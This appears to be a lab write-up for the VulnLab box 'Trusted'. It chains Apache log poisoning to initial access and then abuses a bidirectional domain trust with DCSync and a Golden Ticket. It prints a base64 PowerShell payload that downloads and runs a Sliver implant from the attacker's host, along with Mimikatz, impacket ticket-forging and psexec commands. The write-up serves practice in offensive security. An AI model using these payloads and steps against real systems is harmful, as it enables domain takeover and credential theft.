Post

Trusted Writeup (VulnLab)

An easy rated chain on vulnlab, utilising apache log poisoning for initial access, with bidirectional trust abuse and golden tickets for root.

Trusted Writeup (VulnLab)

Introduction

This box presents a multi-stage Active Directory attack path across a trusted domain setup. Starting with an Apache log poisoning vulnerability for initial access, we go deeper into the environment by leveraging cross-domain trust. Through post-exploitation and enumeration, we discover a bidirectional trust between domains—allowing for a DCSync attack to extract the krbtgt hash and create a Golden Ticket, granting access to the root domain controller.

NMAP Port scans

We start off our writeup with an NMAP scan targeting 2 IP Addresses, they include:

1
2
10.10.218.86
10.10.218.85
1
sudo nmap -sS -sV -A -p- --min-rate 2500 -iL hosts.txt -oA nmapScan --disable-arp-ping --source-port=53

NMAP Scan Result NMAP Scan Result 2

User Flag

HTTP Enumeration

From the results, it is clear that these machines are both Domain Controllers (DCs). I’ll target the ‘labdc.lab.trusted.vl’ DC first, by browsing to the site on Port 80 HTTP: xampp The site showcases a default XAMPP webpage, we can perform directory brute-forcing using feroxbuster in an attempt to uncover any hidden directories that exist:

1
feroxbuster -u http://labdc.lab.trusted.vl -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -t 20
1
2
3
4
5
6
7
8
301      GET        9l       30w      350c http://labdc.lab.trusted.vl/dev => http://labdc.lab.trusted.vl/dev/
301      GET        9l       30w      357c http://labdc.lab.trusted.vl/dev/images => http://labdc.lab.trusted.vl/dev/images/
301      GET        9l       30w      354c http://labdc.lab.trusted.vl/dev/css => http://labdc.lab.trusted.vl/dev/css/
200      GET      612l     1583w    11331c http://labdc.lab.trusted.vl/dev/css/style.css
200      GET       31l      195w    17155c http://labdc.lab.trusted.vl/dev/images/logo.png
200      GET       35l      209w    17125c http://labdc.lab.trusted.vl/dev/images/meeting.jpg
200      GET       30l      162w    11333c http://labdc.lab.trusted.vl/dev/images/smile.jpg
200      GET       24l      156w    11896c http://labdc.lab.trusted.vl/dev/images/family-small.jpg

A directory is discovered under ‘/dev’, manually viewing this webpage presents us with a lawyer’s website along with a suspicious parameter ‘?view=’: http1

Apache Log Poisoning to C2 Session

We can exploit the discovered parameter through apache log poisoning, this was uncovered after manually viewing the source code of the index page through php filtering:

1
https://labdc.lab.trusted.vl/dev/index.html?view=php://filter/convert.base64-encode/resource=index.html
1
base64 -d source.b64 > index.html

httpvuln1 The vulnerable area is the unsanitised usage of PHP’s include function. We can check for the existence of the access.log file to see if it’d be vulnerable to log poisioning:

1
https://labdc.lab.trusted.vl/dev/index.html?view=C:/xampp/apache/logs/access.log

httpvuln2

After confirmation that the access.log file exists on the server, we can create a powershell payload to be executed, this code downloads a Sliver session payload, stores it in the users temp directory and proceeds to execute it:

1
$u="http://10.8.4.194:443/output.exe";$f="$env:TEMP\output.exe.exe";Invoke-WebRequest $u -OutFile $f;Start-Process $f

With our completed payload, we have to convert it into UTF-16LE and then base64 encode so it is in a readable format for powershell. Then we can finally send our payload as the user-agent to the website:

1
 curl -A "<?php system('powershell -e JAB1AD0AIgBoAHQAdABwADoALwAvADEAMAAuADgALgA0AC4AMQA5ADQAOgA0ADQAMwAvAG8AdQB0AHAAdQB0AC4AZQB4AGUAIgA7ACQAZgA9ACIAJABlAG4AdgA6AFQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAC4AZQB4AGUAIgA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAdQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGYACgA='); ?>" http://labdc.lab.trusted.vl/dev/index.html?view=me

We can then execute the payload by visiting the access.log file:

1
 curl -X GET https://labdc.lab.trusted.vl/dev/index.html?view=C:/xampp/apache/logs/access.log --insecure

Accessing the file automatically executes our powershell payload and we are granted a C2 Session: session

We can read the user.txt flag from the directory ‘C:\users\Administrator\Desktop\user.txt’:

1
 type C:\users\Administrator\Desktop\user.txt

session

Root Flag

LABDC.lab.trusted.vl Enumeration and Post-Exploitation

We can then gather domain information using sliver’s armory implementation of sharphound:

1
 sharp-hound-4 -s -t 300 -- -c all,gpolocalgroup

sharp SharpHound didn’t yield any useful results, however we know from previous enumeration that lab.trusted.vl is a child domain of trusted.vl. Mimikatz can be used to enumerate the inbound and outbound trusts:

1
 mimikatz "privilege::debug" "\"lsadump::trust /patch"

mimitrust From the mimikatz output, it is clear there is a bidirectional trust between the child and root domain, the domain SIDS are retrieved from the mimikatz output.

1
2
LAB.TRUSTED.VL (LAB / S-1-5-21-2241985869-2159962460-1278545866)
TRUSTED.VL (TRUSTED / S-1-5-21-3576695518-347000760-3731839591)

Abusing Bidirectional Trust: DCSync to Golden Ticket

As there is a bidirectional trust, we can DCSync and grab the ‘krbtgt’ hash from the compromised ‘labdc.lab.trusted.vl’ machine. To later perform a golden ticket attack:

1
mimikatz "privilege::debug" "\"lsadump::dcsync /domain:lab.trusted.vl /user:LAB\krbtgt"

mimidcsync After successful retrieval of the krbtgt hash, we can combine the domain sids and the hash to create a golden ticket for the root domain ‘trusted.vl’:

1
impacket-ticketer -nthash c7a03c565c68c6fac5f8913fab576ebd -domain lab.trusted.vl -domain-sid "S-1-5-21-2241985869-2159962460-1278545866" -extra-sid "S-1-5-21-3576695518-347000760-3731839591-512" Administrator -extra-pac

gldnticket With our golden ticket now created, we can set it as our kerberos ticket within the attacking OS:

1
export KRB55CNAME=Administrator.ccache

Then finally, psexec into the ‘trusteddc.trusted.vl’ domain controller using our golden ticket:

1
impacket-psexec 'lab.trusted.vl/Administrator@trusteddc.trusted.vl' -k -no-pass -target-ip 10.10.218.85

psexec

As we are now logged in as NT AUTHORITY\SYSTEM, we can read the root flag right? WRONG!. The flag is EFS encrypted, therefore, we must reset the Administrators password and RDP into the box to decrypt the flag:

1
net user Administrator password123456@
1
xfreerdp3 /u:Administrator /p:password123456@ /v:trusteddc.trusted.vl +clipboard

root

This post is licensed under CC BY 4.0 by the author.